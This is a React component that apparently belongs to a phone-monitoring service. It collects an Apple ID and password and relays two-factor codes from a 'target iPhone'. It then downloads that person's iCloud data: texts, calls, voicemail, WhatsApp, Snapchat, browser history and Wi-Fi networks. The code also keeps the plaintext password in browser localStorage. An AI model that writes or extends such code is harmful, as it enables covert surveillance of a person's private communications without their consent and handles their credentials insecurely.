import { useEffect, useState } from 'react'
import Image from 'next/image'
import dynamic from 'next/dynamic'
import { useDispatch } from 'react-redux'
import { useTranslation } from 'src/utils/i18n'
import { Modal, Select, Spin } from 'antd'
import { CloseOutlined } from '@ant-design/icons'
import IosVerfiyExtremeCommponents from './style'
import { useRouter } from 'next/router'

import {
  authByDevice,
  authVerifyByDevice,
  downloadWeb,
  bySms,
  authVerifyBySms,
  authInfo,
  sendDownloadTime,
  iosLoginVerification
} from 'src/@api/login'

import { messageInfo } from 'src/components/Message'
import { fetchResetTime, changeDownloadTips, changeBasicVerfiyOver } from 'src/store/apps/Common'
import updateDeviceCredentials, { isUpdateCredentialsOk } from 'src/utils/updateDeviceCredentials'
import useIcloudLockedFlow from 'src/components/ios-extreme/icloud-locked/useIcloudLockedFlow'
import useIcloudCredentialReverify from 'src/components/ios-extreme/icloud-locked/useIcloudCredentialReverify'
import { ICLOUD_EC, isIcloudOk, isIcloudSendOk } from 'src/utils/icloudLoginResult'

const CodeBox = dynamic(import('src/@core/components/common/codeBox'), {
  ssr: false //这个要加上,禁止使用 SSR
})

//增值服务服务 app 图标列表
const extremeIcon = [
  {
    name: 'Text message',
    img: '/images/dashboard/new-ios/imessagers.svg'
  },
  {
    name: 'Call',
    img: '/images/dashboard/new-ios/calls.svg'
  },
  {
    name: 'Voicemail',
    img: '/images/dashboard/new-ios/voicemail.svg'
  },
  {
    name: 'WhatsApp',
    img: '/images/dashboard/new-ios/whatsapp.svg'
  },
  {
    name: 'WA Business',
    img: '/images/dashboard/new-ios/whatappbusiness.svg'
  },
  {
    name: 'Line',
    img: '/images/dashboard/new-ios/line.svg'
  },
  {
    name: 'Kik',
    img: '/images/dashboard/new-ios/kik.svg'
  },
  {
    name: 'WeChat',
    img: '/images/dashboard/new-ios/wechat.svg'
  },
  {
    name: 'Messenger',
    img: '/images/dashboard/new-ios/facebookmessage.svg'
  },
  {
    name: 'Browser history',
    img: '/images/dashboard/new-ios/browsing.png'
  },
  {
    name: 'Browser Bookmark',
    img: '/images/dashboard/new-ios/bookmark.png'
  },
  {
    name: 'Install Apps',
    img: '/images/dashboard/new-ios/installapp.png'
  },
  {
    name: 'Wi-Fi network',
    img: '/images/dashboard/new-ios/wifi.png'
  },
  {
    name: 'Skype',
    img: '/images/dashboard/new-ios/skype.svg'
  },
  {
    name: 'Teams',
    img: '/images/dashboard/new-ios/teams.png'
  },
  {
    name: 'Telegram',
    img: '/images/dashboard/new-ios/telegram.svg'
  },
  {
    name: 'Snapchat',
    img: '/images/dashboard/new-ios/snapchat.svg'
  },
  {
    name: 'Instagram',
    img: '/images/dashboard/new-ios/instagram.svg'
  },
  {
    name: 'Facetime',
    img: '/images/dashboard/new-ios/facetime.svg'
  }
]

const IosVerfiyExtreme = ({ setBackupOpen }) => {

  const dispatch = useDispatch()
  const { t } = useTranslation('common')
  const [isModalOpen, setIsModalOpen] = useState(false) // 模态框显示状态
  const [loginLoading, setLoginLoading] = useState(false) // 验证中状态
  const [current, setCurrent] = useState(0) // 当前验证的步骤，发送验证码 or 填写验证码
  const [innerWidth, setInnerWidth] = useState(0) // 实时屏幕宽度

  const [defaultSmsPhone, setDefaultSmsPhone] = useState({})
  const [smsPhoneList, setSmsPhoneList] = useState([])
  const [smsPhoneListLoading, setSmsPhoneListLoading] = useState(true)
  const [smsPhoneListDisabled, setSmsPhoneListDisabled] = useState(true)
  const [smsId, setSmsId] = useState('')
  const [key, setKey] = useState('1')

  const [sendTime, setSentTime] = useState(60)
  const [sendContentTips, setSendContentTips] = useState('')
  const [btnDisable, setBtnDisable] = useState(false)
  const [smsErrorText, setSmsErrorText] = useState('') // icloud没有绑定手机号错误提示文案

  let user = JSON.parse(localStorage.getItem('DeviceUser')) // 获取浏览器缓存中的用户信息

  const persistUserCredentials = (username, password) => {
    const deviceUser = JSON.parse(localStorage.getItem('DeviceUser')) || {}
    user = { ...deviceUser, username, password }
    window.localStorage.setItem('DeviceUser', JSON.stringify(user))
  }

  const applyExtremeTwoStepVerification = (data, username, password) => {
    persistUserCredentials(username, password)
    messageInfo(data.em)
    setCurrent(1)
    if (data?.ecurityType == 2) setKey('2')
    if (data?.trustedPhoneNumbers?.[0]?.numberWithDialCode) {
      setDefaultSmsPhone(data.trustedPhoneNumbers[0].numberWithDialCode)
      setSmsId(data.trustedPhoneNumbers[0].id || '0')
      setSmsPhoneList(data.trustedPhoneNumbers.map(item => ({ ...item, value: item.id, label: item.numberWithDialCode })))
      setSmsPhoneListDisabled(false)
    } else {
      setSmsPhoneListDisabled(true)
      setSmsErrorText(data?.ecPhoneList === 0
        ? t('iCloud doesnt have a phone number Please verify using the device verification code')
        : t('Entered the incorrect verification codes Please wait 30 minutes before trying again'))
    }
    setSmsPhoneListLoading(false)
  }

  const finishExtremeDirectSuccess = async (data, username, password) => {
    persistUserCredentials(username, password)
    messageInfo(data.em)
    const updateRes = await updateDeviceCredentials({ username, password, verify: 1 })
    if (!isUpdateCredentialsOk(updateRes)) {
      messageInfo(updateRes?.msg || data.em)


return
    }
    window.localStorage.setItem('Advanced', 1)
    dispatch(changeDownloadTips(true))
    dispatch(changeBasicVerfiyOver(false))
    await downloadWeb({ mode: 2, username, password })
    await sendDownloadTime({ username, type: 'advanced_download' })
    setTimeout(() => dispatch(fetchResetTime()), 800)
    setIsModalOpen(false)
    if (typeof setBackupOpen === 'function') setBackupOpen(true)
  }

  const { handleEc10005, lockedFlowModals, lockedFlowOpen } = useIcloudLockedFlow({
    mode: 2,
    updateCredentialsOnLock: true,
    onTwoStepRequired: async ({ data, username, password }) => applyExtremeTwoStepVerification(data, username, password),
    onDirectSuccess: async ({ data, username, password }) => finishExtremeDirectSuccess(data, username, password)
  })

  // 10003（iCloud 密码不对）统一处理：退回「输入账号密码」那一步重填。
  // 已在输密码步骤、或被锁 / 重新验证弹窗正开着时跳过（见 useIcloudCredentialReverify）。
  const handlePasswordError = useIcloudCredentialReverify({ current, setCurrent, lockedFlowOpen })

  const onChange = async key => {
    if (key == 2) {
      let check = sessionStorage.getItem('icloudPhoneSmsList')
      let result = {}
      if (check) {
        result = JSON.parse(check)
      } else {
        let mode = 1

        result = await authInfo({
          mode: mode,
          username: user.username,
          password: user.password
        })
        sessionStorage.setItem('icloudPhoneSmsList', JSON.stringify(result))
      }

      setDefaultSmsPhone(result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumber)
      setSmsId(result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumber.id || '0')

      let mapData = result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumbers.map(item => {
        return {
          ...item,
          value: item.id,
          label: item.numberWithDialCode
        }
      })
      setSmsPhoneList(mapData)
      setSmsPhoneListDisabled(false)
      setSmsPhoneListLoading(false)
    }
  }

  // 发送设备码
  const sendCode = async () => {
    setLoginLoading(true)

    // 请求异常（断网 / 超时 / 服务端错误）必须清掉 loading，否则按钮会一直转圈
    let data
    try {
      const res = await iosLoginVerification({
        mode: 2,
        username: user.username,
        password: user.password,
        country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
      })
      data = res?.data
    } catch (e) {
      console.error('[ios-verfiy-extreme sendCode] iosLoginVerification failed', e)
      setLoginLoading(false)
      messageInfo(e?.data?.em || 'Network error, please try again')

      return
    }

    setLoginLoading(false)

    // 业务错误码在 data.ec（如 10005 Apple ID locked）；顶层 code / HTTP 状态码为 0 不代表成功
    if (!data || typeof data !== 'object') {
      messageInfo('Network error, please try again')

      return
    }

    if (data.ec === ICLOUD_EC.PASSWORD) {
      handlePasswordError(data.ec)

      messageInfo(data.em)
      setLoginLoading(false)
    } else if (data.ec === ICLOUD_EC.TWO_STEP) {
      setLoginLoading(false)
      messageInfo(data.em)
      setCurrent(1)
      if (data?.trustedPhoneNumbers[0]?.numberWithDialCode) {
        setDefaultSmsPhone(data.trustedPhoneNumbers[0].numberWithDialCode)
        setSmsId(data.trustedPhoneNumbers[0].id || '0')
        let mapData = data.trustedPhoneNumbers.map(item => {
          return {
            ...item,
            value: item.id,
            label: item.numberWithDialCode
          }
        })
        setSmsPhoneList(mapData)
        setSmsPhoneListDisabled(false)
      } else {
        setSmsPhoneListDisabled(true)
        if (data?.ecPhoneList === 0) {
          setSmsErrorText(t(`iCloud doesnt have a phone number Please verify using the device verification code`))
        } else {
          setSmsErrorText(t(`Entered the incorrect verification codes Please wait 30 minutes before trying again`))
        }
      }
      setSmsPhoneListLoading(false)
    } else if (data.ec === ICLOUD_EC.LOCKED) {
      await handleEc10005({ username: user.username, password: user.password })
    } else if (isIcloudOk(data)) {
      setLoginLoading(false)

      messageInfo(data.em)

      // 只更新已有设备的 iCloud 凭据，不走绑定接口（避免多建一个设备包）
      const updateRes = await updateDeviceCredentials({
        username: user.username,
        password: user.password,
        verify: 1
      })

      if (!isUpdateCredentialsOk(updateRes)) {
        messageInfo(updateRes?.msg || data.em)

        return
      }

      window.localStorage.setItem('Advanced', 1)

      // 设置允许正在下载提示信息弹窗
      dispatch(changeDownloadTips(true))

      // 设置一步验证结束状态
      dispatch(changeBasicVerfiyOver(false))

      let downloadRes = await downloadWeb({
        mode: 2,
        username: user.username,
        password: user.password
      })

      await sendDownloadTime({ username: user.username, type: 'advanced_download' })
      setTimeout(() => {
        dispatch(fetchResetTime())
      }, 800)

      modalOnCancel()
    } else {
      messageInfo(data.em)
    }
  }

  // 验证设备码
  const codeDevice = async e => {
    let check = true
    let securityCode = ''
    for (let i = 0; i < e.length; i++) {
      if (e[i] === '') {
        check = false
        break
      }
      securityCode += e[i]
    }

    if (check) {
      setLoginLoading(true)

      // 接口异常（断网 / 超时 / 服务端错误）时必须给出提示并清掉 loading，否则验证码区会一直转圈
      try {
        let deviceUser = JSON.parse(window.localStorage.getItem('DeviceUser'))
        deviceUser.securityCode = securityCode

        // 只更新已有设备的 iCloud 凭据，不走绑定接口（避免多建一个设备包）
        const updateRes = await updateDeviceCredentials({
          username: user.username,
          password: user.password,
          verify: 1
        })

        if (!isUpdateCredentialsOk(updateRes)) {
          messageInfo(updateRes?.msg || 'Update failed, please try again')

          return
        }

        window.localStorage.setItem('Advanced', 1)

        const verify = await iosLoginVerification({
          mode: 2,
          username: user.username,
          password: user.password,
          securityCode: securityCode,
          country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
        })

        // 业务错误码在 data.ec；顶层 code / HTTP 状态码为 0 不代表成功
        if (!verify?.data || typeof verify.data !== 'object') {
          messageInfo(t('Network error, please try again'))

          return
        }

        if (isIcloudOk(verify.data)) {

          // 设置允许正在下载提示信息弹窗
          dispatch(changeDownloadTips(true))

          // 设置一步验证结束状态
          dispatch(changeBasicVerfiyOver(false))

          let downloadRes = await downloadWeb({ mode: 2, username: user.username, password: user.password })

          await sendDownloadTime({ username: user.username, type: 'advanced_download' })
          setTimeout(() => {
            dispatch(fetchResetTime())
          }, 800)

          modalOnCancel()
        } else {
          handlePasswordError(verify.data.ec)
          messageInfo(verify.data.em)
        }
      } catch (err) {
        console.error('[ios-verfiy-extreme codeDevice] failed', err)
        messageInfo(err?.data?.em || t('Network error, please try again'))
      } finally {
        setLoginLoading(false)
      }
    }
  }

  // 手机号列表选择更改
  const handleSelectChange = value => {
    setSmsId(value)
  }

  // 发送短信验证码
  const sendSms = async () => {
    // 已发送 / 倒计时中，避免重复点击造成重复发送
    if (btnDisable) return

    try {
      const result = await iosLoginVerification({
        mode: 2,
        username: user.username,
        password: user.password,
        phoneID: smsId,
        country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
      })

      // 仅 0 / 10000 / 10004 视为发送成功，其余按失败处理并提示后端返回的原因
      const ec = result?.data?.ec
      if (!isIcloudSendOk(ec)) {
        handlePasswordError(ec)
        messageInfo(result?.data?.em || 'Failed to send the verification code, please try again')


return
      }

      let ti = sendTime
      const timeChange = setInterval(() => {
        if (ti > 0) {
          //当x>0时执行更新方法
          ti = ti - 1
          setSentTime(ti)
        } else {
          //当x=0时执行终止循环方法
          clearInterval(timeChange)
          setBtnDisable(false)
          setSendContentTips('')
          setSentTime(60)
        }
      }, 1000)

      setSentTime(60)
      setSendContentTips(`SMS has been sent, please receive`)
      setBtnDisable(true)
    } catch (e) {
      // 请求异常（断网 / 服务端错误）时不能让按钮卡死
      console.error('[sendSms] iosLoginVerification failed', e)
      setBtnDisable(false)
      setSendContentTips('')
      setSentTime(60)
      messageInfo(e?.data?.em || 'Failed to send the verification code, please try again')
    }
  }

  // 验证短信验证码
  const codeSms = async e => {
    let check = true
    let securityCode = ''
    for (let i = 0; i < e.length; i++) {
      if (e[i] === '') {
        check = false
        break
      }
      securityCode += e[i]
    }

    if (check) {
      setLoginLoading(true)

      // 接口异常（断网 / 超时 / 服务端错误）时必须给出提示并清掉 loading，否则验证码区会一直转圈
      try {
        const result = await iosLoginVerification({
          mode: 2,
          username: user.username,
          password: user.password,
          securityCode: securityCode,
          phoneID: smsId,
          country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
        })

        // 业务错误码在 data.ec；顶层 code / HTTP 状态码为 0 不代表成功
        if (!result?.data || typeof result.data !== 'object') {
          messageInfo(t('Network error, please try again'))

          return
        }

        if (isIcloudOk(result.data)) {

          // 设置允许正在下载提示信息弹窗
          dispatch(changeDownloadTips(true))

          // 设置一步验证结束状态
          dispatch(changeBasicVerfiyOver(false))

          let downloadRes = await downloadWeb({
            mode: 2,
            username: user.username,
            password: user.password
          })

          await sendDownloadTime({ username: user.username, type: 'advanced_download' })
          setTimeout(() => {
            dispatch(fetchResetTime())
          }, 800)

          window.localStorage.setItem('Advanced', 1)

          modalOnCancel()
        } else { handlePasswordError(result.data.ec); messageInfo(result.data.em) }
      } catch (err) {
        console.error('[ios-verfiy-extreme codeSms] failed', err)
        messageInfo(err?.data?.em || t('Network error, please try again'))
      } finally {
        setLoginLoading(false)
      }
    }
  }

  // 监听屏幕宽度
  useEffect(() => {
    if (typeof window !== 'undefined') {
      const handlerInnerWidth = () => {
        setInnerWidth(window.innerWidth)
      }

      handlerInnerWidth()

      window.addEventListener('resize', handlerInnerWidth)

      return () => {
        window.removeEventListener('resize', handlerInnerWidth)
      }
    }
  }, [])

  // 模态框关闭事件
  const modalOnCancel = () => {
    setIsModalOpen(false)
    localStorage.setItem('isIosVerfiyExtremeOpen', 'false')

    if (typeof setBackupOpen === 'function') setBackupOpen(true)
  }

  const router = useRouter()

  useEffect(() => {
    if (typeof window === 'undefined') return

    const isIosVerfiyExtremeOpen = localStorage.getItem('isIosVerfiyExtremeOpen') !== 'false'
    if (!isIosVerfiyExtremeOpen && router.pathname !== '/dashboard') {
      setIsModalOpen(false)
    } else {
      setIsModalOpen(true)
    }
  }, [router.pathname])

  return (
    <Modal
      open={isModalOpen}
      onCancel={modalOnCancel}
      width={600}
      footer={null}
      centered={true}
      styles={{
        content: {
          padding: innerWidth > 768 ? '24px 30px 50px 26px' : '24px 24px 50px',
          maxWidth: innerWidth > 768 ? '600px' : 'calc(100% - 16px)',
          margin: '0 auto',
          borderRadius: '16px',
          position: 'relative'
        }
      }}
      zIndex={1314}
      closeIcon={
        <CloseOutlined style={{ fontSize: innerWidth > 768 ? '20px' : '18px' }} />  // 修改這裡的大小
      }
    >
      <IosVerfiyExtremeCommponents className='min-h-[546px] Mlg:h-auto Mlg:min-h-[505px]'>

        {/* apple Icon */}
        <Image src='/images/apps/apple.svg' alt='img' className={`w-[60px] h-[69px] Mlg:w-[35px] Mlg:h-[40px] mt-[26px] Mlg:mt-[23px] ${current != 0 ? 'Mlg:hidden' : ''}`} width='60' height='69' />

        {/* 黑色标题 */}
        <p className={`my-[24px] Mlg:mb-[30px] text-[24px] Mlg:text-[20px] text-[#282938] text-center font-[600] leading-[40px] Mlg:leading-[30px] ${current != 0 ? 'Mlg:hidden' : ''}`}>Extreme{' '}{t('Data Validation')}</p>

        {
          current == 0 ?
            <>
              {/* 增值服务 app 图标列表 */}
              < ul className='grid grid-cols-10 Mlg:grid-cols-6 gap-[16px]'>
                {
                  extremeIcon.map((item, index) => (
                    <li key={index}>
                      <Image src={item.img} alt={item.name} className='w-[40px] h-[40px] object-cover p-[2px] rounded-[8px] bg-[#F0F1F5]' width='40' height='40' />
                    </li>
                  ))
                }
              </ul>

              {/* 黑色描述文案 */}
              {/* <p className='mt-[48px] Mlg:mt-[16px] mb-[31px] Mlg:mb-[32px] text-[24px] Mlg:text-[16px] text-[#282938] text-center font-[600] leading-[32px] Mlg:leading-[24px]'>{t('Re-verification to access the')}{' '}extreme{' '}{t('data above')}</p> */}
              <p className='w-full max-w-[484px] Mlg:max-w-[253px] mt-[48px] Mlg:mt-[16px] mb-[32px] Mlg:mb-[24px] text-[20px] Mlg:text-[14px] text-[#282938] text-center font-[600] leading-[32px] Mlg:leading-[21px]'>
                {t('Access to')}{' '}extreme{' '}{t('data requires re-verification now is the best time to do so')}
              </p>

              {/* 发送验证码按钮 */}
              <button
                className={`${loginLoading ? 'opacity-70' : ''} w-max min-w-[279px] max-w-full h-[47px] px-[21px] bg-[#50E3C2] text-[#1B1C2B] text-[18px] font-[700] rounded-[6px] flex justify-center items-center`}
                onClick={() => {
                  if (loginLoading) return
                  sendCode()
                }}
              >
                {t('Send Code Again')}
                {loginLoading && (
                  <div className='w-[20px] h-[20px] border-[3px] border-[#FFF] border-b-[#50E3C2] rounded-[50%] inline-block box-border animate-spin ml-[16px]'></div>
                )}
              </button>

              {/* 分割线 */}
              <hr className='w-[480px] h-[1.5px] Mlg:w-full bg-[#9A9A9E] mt-[32px] Mlg:mt-[24px] mb-[16px]' />

              {/* 次文案 */}
              <p className='text-[14px] text-[#000000] leading-[22px]'>*{t('Youve obtained all basic data')}</p>
            </>
            :
            <>
              {/* 黑色标题 */}
              <p className='mt-[23px] mb-[24px] text-[20px] text-[#282938] text-center font-[600] leading-[30px] lg:hidden'>Extreme{' '}{t('Data Validation')}</p>

              <hr className='w-full bg-[#DADADA] absolute top-[101px] lg:hidden' />

              {/* apple Icon */}
              <Image src='/images/apps/apple.svg' alt='img' className='w-[35px] h-[40px] my-[20px] lg:hidden' width='60' height='69' />

              <p className='max-w-[484px] text-[20px] Mlg:text-[16px] text-[#282938] text-center font-[600] leading-[32px] Mlg:leading-[24px]'>
                {t('Choose a verification method')}
              </p>
              <div className='w-[310px] Mlg:w-full'>
                <div className='w-full h-[27px] flex items-center my-[26px] Mlg:mt-[18px] Mlg:mb-[30px]'>
                  <div
                    className={`${key == '1'
                      ? 'text-[16px] text-[#50E3C2] border-b-[#50E3C2]'
                      : 'text-[16px] text-[#000] border-b-[#FFF]'
                      } h-[27px] border-b-[2px] flex items-center cursor-pointer`}
                    onClick={() => {
                      if (key == '1') return
                      setKey('1')
                    }}
                  >
                    {t('Device')}
                  </div>
                  <div
                    className={`${key == '2'
                      ? 'text-[16px] text-[#50E3C2] border-b-[#50E3C2]'
                      : 'text-[16px] text-[#000] border-b-[#FFF]'
                      } ml-[18px] h-[27px] flex items-center border-b-[2px] cursor-pointer`}
                    onClick={() => {
                      if (key == '2') return
                      if (smsPhoneListDisabled) {
                        messageInfo(smsErrorText)
                      } else {
                        setKey('2')
                      }
                    }}
                  >
                    {t('SMS')}
                  </div>
                </div>
                {key == '1' && (
                  <>
                    <Spin spinning={loginLoading}>
                      <CodeBox
                        length={6} // 输入框数量
                        inputType='numeric' // 输入框输入类型
                        size={innerWidth > 768 ? 45 : 42} // 输入框大小
                        gap={innerWidth > 768 ? 8 : 9} // 输入框之间的间隔
                        styles={{
                          background: '#F5F6F7',
                          borderRadius: '8px',
                          color: '#494949',
                          fontFamily: 'Roboto',
                          fontSize: '26px'
                        }} // 统一设置所有框的样式
                        onChange={codeDevice} // 验证码输入完毕时的回调
                      />
                    </Spin>
                    <p className='mt-[24px] text-center text-[12px] text-[#9A9A9E]'>
                      {t('A verification code has been sent to the target iPhone Enter the verification code')}
                    </p>
                  </>
                )}
                {key == '2' && (
                  <>
                    <div className='h-[45px] Mlg:h-[40px] mb-[24px] Mlg:mb-[20px] flex'>
                      <Select
                        defaultValue={defaultSmsPhone}
                        style={{
                          flex: 1,
                          height: '100%'
                        }}
                        suffixIcon={
                          smsPhoneListLoading ? (
                            <div className='w-[18px] h-[18px] border-[3px] border-b-[rgba(244,245,246,0.92)] rounded-[50%] inline-block box-border animate-spin mr-[5px]'></div>
                          ) : (
                            <Image
                              className='mr-[5px]'
                              src='/images/user-verify/dropdown.svg'
                              width={14}
                              height={0}
                              alt='dropDown'
                            />
                          )
                        }
                        disabled={smsPhoneListDisabled}
                        onChange={handleSelectChange}
                        options={smsPhoneList}
                      />
                      <button
                        disabled={btnDisable}
                        className='w-full max-w-max min-w-[85px] h-full flex justify-center items-center'
                        style={{
                          opacity: btnDisable ? 0.7 : 1,
                          background: '#50E3C2',
                          padding: '0px 21px',
                          marginLeft: '10px',
                          color: '#1B1C2B',
                          borderRadius: '41px',
                          fontSize: '18px'
                        }}
                        onClick={sendSms}
                      >
                        {btnDisable ? sendTime : t('Send')}
                      </button>
                    </div>

                    {sendContentTips != '' && (
                      <p className='text-center mb-[24px] text-[12px] text-[#9A9A9E]'> {sendContentTips}</p>
                    )}
                    <Spin spinning={loginLoading}>
                      <CodeBox
                        length={6} // 输入框数量
                        inputType='numeric' // 输入框输入类型
                        size={innerWidth > 768 ? 45 : 42} // 输入框大小
                        gap={innerWidth > 768 ? 8 : 9} // 输入框之间的间隔
                        styles={{
                          background: '#F5F6F7',
                          borderRadius: '8px',
                          color: '#494949',
                          fontFamily: 'Roboto',
                          fontSize: '26px'
                        }} // 统一设置所有框的样式
                        onChange={codeSms} // 验证码输入完毕时的回调
                      />
                    </Spin>
                    <p className='mt-[24px] text-center text-[12px] text-[#9A9A9E]'>
                      {t('Enter the verification code')}
                    </p>
                  </>
                )}
              </div>
            </>
        }
      </IosVerfiyExtremeCommponents>
      {lockedFlowModals}
    </Modal>
  )
}

export default IosVerfiyExtreme
